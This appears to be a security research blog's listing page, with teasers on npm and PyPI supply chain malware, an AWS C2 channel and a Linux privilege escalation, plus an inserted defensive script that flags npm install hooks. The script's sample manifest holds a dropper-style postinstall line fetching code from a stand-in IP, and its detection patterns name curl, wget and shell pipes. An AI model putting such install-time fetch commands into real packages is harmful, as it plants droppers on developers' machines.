Mastra Supply Chain Compromise: easy-day-js Dropper Pulls a Cross-Platform RAT Into @mastra Installs
Executive Summary On June 17 2026, a coordinated supply chain attack pushed a malicious easy-day-js package into the dependency tree of the entire @mastra/* npm organization. Any npm install of a compromised @mastra/* package pulls [email protected], which runs a postinstall dropper that downloads a cross-platform RAT and installs persistent backdoors on macOS, Linux, and Windows. The Mastra […]
From “Encrypt Everything” to “Encrypt for the Quantum Era”: The Upwind Cloud Cryptography Framework
For most of the last decade, cloud security teams have lived by a simple slogan: encrypt everything. Encrypt at rest. Encrypt in transit. Use customer-managed keys. Rotate them. Pass the audit. Move on. That slogan just expired. In August 2024, NIST finalized the first three post-quantum cryptography (PQC) standards and explicitly told organizations: start using […]
Miasma: A Worming npm Supply Chain Attack on Red Hat Cloud Services
Executive Summary On June 1, 2026, unauthorized commits were pushed to repositories in the RedHatInsights GitHub organization and used to publish malicious versions of 32 packages under the @redhat-cloud-services npm scope. The campaign, tracked as Miasma, executes a 4.2 MB obfuscated payload through an npm preinstall hook the moment any of these packages is installed, […]
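Both the easy-day-js and Miasma entries above hinge on the same primitive: npm runs `preinstall`/`install`/`postinstall` scripts declared in a dependency's package.json at install time, so a compromised package executes before any of its code is ever imported. The following is an added example, not Upwind's code and not part of either write-up, showing the check a practitioner can run over a dependency tree: enumerate every declared lifecycle hook and rank those whose script body fetches remote content or executes inline code. The package names, versions and script bodies in `SAMPLE_MANIFESTS` are constructed for the example; the `203.0.113.5` address is documentation space, not real infrastructure.

```javascript
// Added example (not Upwind's code): flag npm packages that declare install-time
// lifecycle scripts, the execution primitive used by install-hook droppers.
// In a real tree you would read each node_modules/<pkg>/package.json from disk;
// here the manifests are constructed inline so the check runs offline.

const LIFECYCLE_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// Patterns that are suspicious inside an install hook: remote fetches,
// inline code execution, base64 decoding, and shell pipes into interpreters.
const SUSPICIOUS = [
  /\b(curl|wget|Invoke-WebRequest|iwr)\b/i,
  /\bnode\s+-e\b/,
  /\bpowershell\b.*-enc/i,
  /base64/i,
  /\|\s*(sh|bash|node|python3?)\b/,
  /\bhttps?:\/\//i,
];

// Inspect one parsed package.json. Returns one finding per declared lifecycle
// hook; severity is "high" when the script body also matches a suspicious
// pattern, otherwise "info" (native addons and build steps legitimately use
// install/prepare hooks, so "info" means "review", not "clean").
function auditManifest(manifest) {
  const scripts = (manifest && manifest.scripts) || {};
  const findings = [];
  for (const hook of LIFECYCLE_HOOKS) {
    if (typeof scripts[hook] !== "string") continue;
    const body = scripts[hook];
    const matched = SUSPICIOUS.filter((re) => re.test(body)).map((re) => re.source);
    findings.push({
      pkg: `${manifest.name}@${manifest.version}`,
      hook,
      script: body,
      severity: matched.length ? "high" : "info",
      matched,
    });
  }
  return findings;
}

// Audit a whole tree given an array of parsed manifests.
function auditTree(manifests) {
  return manifests.flatMap(auditManifest);
}

// Constructed sample manifests (hypothetical names and versions, not real packages).
const SAMPLE_MANIFESTS = [
  { name: "benign-lib", version: "1.0.0", scripts: { test: "jest" } },
  { name: "native-addon", version: "2.3.1", scripts: { install: "node-gyp rebuild" } },
  {
    name: "dropper-example",
    version: "0.0.9",
    scripts: {
      postinstall:
        "node -e \"require('https').get('http://203.0.113.5/x.js',r=>r.pipe(process.stdout))\"",
    },
  },
  // A hook that only runs a file shipped inside the tarball: this is how an
  // obfuscated in-package payload looks, and it does NOT match the patterns above.
  { name: "preinstall-example", version: "4.2.0", scripts: { preinstall: "node dist/setup.js" } },
];

if (typeof require !== "undefined" && require.main === module) {
  for (const f of auditTree(SAMPLE_MANIFESTS)) {
    console.log(`[${f.severity}] ${f.pkg} ${f.hook}: ${f.script}`);
  }
}
```

To run this against a real checkout, replace `SAMPLE_MANIFESTS` with the result of globbing `node_modules/**/package.json` and `JSON.parse`-ing each file. The `preinstall-example` entry is the important caveat: a hook that simply runs a large obfuscated file already inside the tarball (the Miasma pattern) produces only an "info" finding, so every declared hook in a package whose version changed since the last known-good lockfile should be reviewed, not just the ones the regexes flag. Installing with `npm ci --ignore-scripts` in CI and allow-listing the few packages that genuinely need hooks removes the primitive altogether.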
No Way Out? Bypassing the AWS Data Perimeter with Bedrock AgentCore
A novel Command-and-Control (C2) channel weaponizes legitimate AWS services to establish two data channels, successfully circumventing one of the cloud’s strongest security defenses. Status: Infiltration Channel is FIXED, Exfiltration Channel is OPEN. TL;DR This research was presented at fwd:cloudsec North America 2026. Watch the full talk below. What Is the AWS Data Perimeter? For the […]
Upwind Researcher Spotlight: Dan Gansel
“You have to map the core logic and syntax of the system before you can find the interesting primitives.” This June 1st, Dan Gansel will walk on stage at fwd:cloudsec 2026 in North America to demonstrate a fully functional command-and-control channel that operates inside the AWS Data Perimeter, the cloud-native gold standard for keeping sensitive […]
Newly Discovered durabletask Malware Targeted Kubernetes, Cloud Secrets, and CI/CD Infrastructure
Executive Summary Upwind identified a critical supply chain compromise involving durabletask==1.4.1, 1.4.2, and 1.4.3, three consecutive malicious releases of Microsoft’s Azure Durable Task Python SDK published to PyPI. Each malicious release contains a lightweight dropper embedded directly into durabletask/__init__.py. On import, the package downloads and executes a remote payload named rope.pyz from attacker-controlled infrastructure. The […]
The New Face of Supply Chain Attacks: npm Malware Built for CI/CD and Cloud Compromise
Executive Summary Upwind is tracking an active software supply chain campaign impacting multiple npm packages commonly used across developer tooling, frontend frameworks, CI/CD pipelines, and cloud-native application environments. We identified malicious payloads designed specifically to target CI/CD systems, cloud identities, GitHub credentials, npm publishing workflows, developer machines, and AI developer tooling. The campaign includes install-time […]
The Supply Chain Strikes Again: Credential-Stealing Malware Hidden in node-ipc
Executive Summary On May 14, 2026, malicious versions of the widely used node-ipc npm package were published through a legitimate maintainer account, introducing a sophisticated credential-stealing payload into a package with approximately 3.35 million monthly downloads. The malicious payload was hidden inside the CommonJS bundle (node-ipc.cjs) and silently executed whenever applications loaded the package through […]
Shai-Hulud: Here We Go Again – Dissecting a Supply Chain Worm Across the TanStack Ecosystem
Executive Summary A new wave of the Mini Shai-Hulud campaign compromised dozens of official @tanstack/* npm packages by abusing CI/CD publishing workflows and trusted npm release mechanisms. Unlike traditional dependency malware focused only on downstream execution, this operation behaves as a self-propagating supply chain worm designed to continuously spread across repositories, developer environments, and CI/CD […]
Dirty Frag: A Universal Linux Local Privilege Escalation via ESP and RxRPC (CVE-2026-43284 / CVE-2026-43500)
Executive Summary Dirty Frag is a new Linux kernel local privilege escalation that combines two kernel bugs, one in the IPsec subsystem and one in RxRPC, giving any unprivileged local user a root shell on every major distribution. The exploit is reliable and lasts until a reboot or cache fault. Public PoC code has […]